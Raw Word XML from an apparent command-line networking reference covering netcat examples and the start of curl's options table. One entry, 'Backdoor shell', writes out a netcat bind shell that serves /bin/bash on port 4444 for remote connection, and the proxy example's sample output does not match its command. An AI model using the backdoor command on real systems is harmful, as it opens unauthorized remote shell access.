    <w:p w14:paraId="705B86CD" w14:textId="583B22B4" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>File transfer over network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F65A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On receiver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFA8E68"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l 9999 &gt; received_file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935F91C"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66A28308"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On sender:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0389BE4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target_ip 9999 &lt; file_to_send.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56553A47" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Simple file transfer without FTP/SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA98E23" w14:textId="2B0851B6" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Create simple web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE8E1C"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echo -e "HTTP/1.1 200 OK\n\nHello World" | nc -l 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5EA741" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204355B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When client connects to port 8080:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523BEC9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ET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFABDA"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Host: localhost:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A0ABF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User-Agent: curl/7.81.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2713C" w14:textId="77777777" w:rsid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Accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DC364" w14:textId="77777777" w:rsidR="005F3C78" w:rsidRPr="00251962" w:rsidRDefault="005F3C78"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6DEED559"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Server responds with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7BAD44"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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3064F"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Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1405E13D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EA126" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Client sends HTTP GET request for root path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20990D4B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: localhost:8080</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Client specifies the target server and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FAB99" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Agent: curl/7.81.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Client identifies itself as curl version 7.81.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A86CCA5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accept: */*</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Client accepts any content type in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065BB65" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Server responds with success status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2E948" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Empty line</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Separates HTTP headers from response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C55F5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hello World</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: The actual content served to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A79EF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simple HTTP server</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Demonstrates basic web server functionality using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74AF2D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Quick web server for testing or development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707113CE" w14:textId="39D24D4D" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D11CA76"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nv 192.168.1.100 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E90D7D2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Identify services and versions running on ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B49404" w14:textId="09B3A615" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Backdoor shell (educational/testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F39B1"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On target (listener):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667505C7"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l -p 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B9243"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63D6EE8D"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On attacker (connector):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A8BBC"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target_ip 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F9672" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Remote shell access (use only for authorized testing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB6383" w14:textId="46885F76" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>UDP communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A857918"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Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D838C20"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u -l 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA36B82"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4A6049CB"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Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBDC57"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u server_ip 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40EF83" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Test UDP-based applications and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653162CF" w14:textId="06B0C6F3" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Keep connection alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A88075"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k -l 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0554D981" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Server that accepts multiple connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2328EAE7" w14:textId="2DF9C2A4" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Connection with timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C86CD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w 5 google.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B056F64" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Automatic disconnect after 5 seconds of inactivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F3B26" w14:textId="3F1E1286" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Hex dump traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD0954"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x google.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BBC445" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Debug protocol communications in hex format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B653C26" w14:textId="3A72F602" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Source port specification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C13050"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p 8080 google.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F672183" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Connect from specific local port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227D7E20" w14:textId="4742E1A7" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>IPv6 connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C5BCE"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6 ipv6.google.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AC0EE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Test IPv6 connectivity and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E085528" w14:textId="03F2BAFA" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Proxy connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B7D28C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="002519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X connect -x proxy:8080 target.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593C693A" w14:textId="77777777" w:rsidR="005F3C78" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Connect through HTTP proxy server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371517CE" w14:textId="7F96DA2A" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F1699" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="0023491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t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: connect to google.com port 80 (tcp) failed: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252C079" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="0023491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onnection to google.com 443 port [tcp/https] succeeded!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEDA70" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="0023491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c: connect to google.com port 81 (tcp) failed: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFEFDE3" w14:textId="3442E4BB" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5EC967" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command is a versatile tool for transferring data to/from servers using various protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11614964" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49340E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Test HTTP/HTTPS endpoints, download files, upload data, and interact with web APIs and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5ED5CC" w14:textId="273D5E4E" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CF5B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options] URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB11AB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3103"/>
        <w:gridCol w:w="5323"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="63A9C90F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AD1C321" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:lastRenderedPageBreak/>
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C37CC69" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="560F13F9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03933A64"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X METHOD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4233BE0F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Specify HTTP method (GET, POST, PUT, DELETE, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="24E5596E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B7E1F16"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H "header"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="507B4A7C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Add custom header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7CEDDF25" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DA49766"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d "data"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E50CDA3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Send data in request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2DACA3AD" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C96953D"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o filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47E8164F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Save output to file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="186D06E6" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="530FE88E"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O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24597F15" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Save with remote filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5E715D53" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29AE56DC"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L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2046FD55" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Follow redirects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5500AD20" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1622E0"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i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7244D087" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Include response headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5757E435" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15FE75A0"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I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
